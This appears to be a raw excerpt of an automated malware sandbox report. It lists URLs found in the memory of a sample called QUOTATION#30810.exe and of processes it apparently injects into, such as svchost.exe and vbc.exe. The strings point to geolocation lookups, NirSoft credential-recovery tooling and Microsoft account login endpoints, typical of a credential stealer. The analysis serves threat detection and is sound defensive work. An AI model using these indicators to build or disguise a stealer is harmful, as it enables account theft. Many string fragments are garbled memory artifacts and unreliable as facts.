Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd.
Source: svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd84
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdA
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcred
Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam
Source: svchost.exe, 0000001F.00000003.1797644727.0000013DBA872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0n
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdQ
Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdody
Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c
Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657217744.0000013DBB181000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 0000001F.00000003.1816023590.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, csc.exe, ngen.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: svchost.exe, 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ngen.exe, 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpCt
Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: bhv32CD.tmp.32.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: svchost.exe, 0000001F.00000003.1822570517.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80601
Source: svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: svchost.exe, 0000001F.00000003.3655978319.0000013DBB137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656004311.0000013DBB13A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656111087.0000013DBB141000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656988856.0000013DBB143000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trusten
Source: QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC802E0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.0000022707615000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDC19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080075000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.25.dr	String found in binary or memory: http://upx.sf.net
Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: vbc.exe, 00000020.00000002.1858485035.0000000000EE4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=8
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502y0
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/i
Source: svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601=
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765186757.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000001F.00000002.3658767257.0000013DBB66F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655631981.0000013DBA93B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf215
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=8
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf=
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf.com
Source: svchost.exe, 0000001F.00000003.1822188194.0000013DBA8EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.sf
Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrfre
Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
